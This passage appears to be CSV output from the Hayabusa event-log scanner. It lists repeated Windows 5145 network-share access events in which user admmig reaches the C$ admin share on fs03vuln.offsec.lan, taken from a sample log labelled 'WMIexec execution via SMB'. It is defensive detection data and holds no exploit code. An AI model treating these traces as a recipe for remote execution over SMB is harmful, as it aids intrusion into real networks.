Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.937 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.953 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.984 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.015 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.050 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.064 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 